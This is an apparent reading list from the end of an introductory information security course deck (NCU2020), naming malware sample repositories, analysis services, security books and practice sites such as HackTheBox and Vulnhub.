Das Malwerk: http://dasmalwerk.eu/ • Hybrid Analysis: https://www.hybrid-analysis.com/ • KernelMode.info: http://www.kernelmode.info/forum/viewforum.php?f=16 • MalShare: http://malshare.com/ • Malware.lu’s AVCaesar: http://avcaesar.malware.lu/ • malware-traffic-analysis.net https://www.malware-traffic-analysis.net/ • Objective-See Collection: https://objective-see.com/malware.html • PacketTotal: https://packettotal.com/malware-archive.html • SNDBOX: https://app.sndbox.com/ • theZoo: https://thezoo.morirt.com/ • VirusBay: https://beta.virusbay.io/ • VirusShare: http://virusshare.com/ • Virusign: http://www.virusign.com/ • VirusSign: https://www.virussign.com/downloads.html

> Books: • Security for Web Developers – John Paul
Mueller • 加密與解密 – 段剛 • HackerPlayBook v2 • HackerPlayBook v3 • Kali Linux 滲透測試工具第二版 • 白帽子講Web安全 • The Browser Hacker’s Handbook駭客攻防聖經 • Mastering Metasploit – Nipun Jaswal Websites: • OWASP • Mitre ATT&CK • HackTheBox • Vulnhub • XSS game • Lord-of-SQLinjection • Pwnable.kr • Sucuri

• Penetration Test • Anti-Virus Driver • Sandbox • Secure
Compiler • Fuzzing Test • Symbolic Execution • Android Kernel • Linux Kernel • CAN Bus

NCU2020 Information Security 101

NCU2020 Information Security 101

More Decks by NotSurprised

Other Decks in Education

Featured

Transcript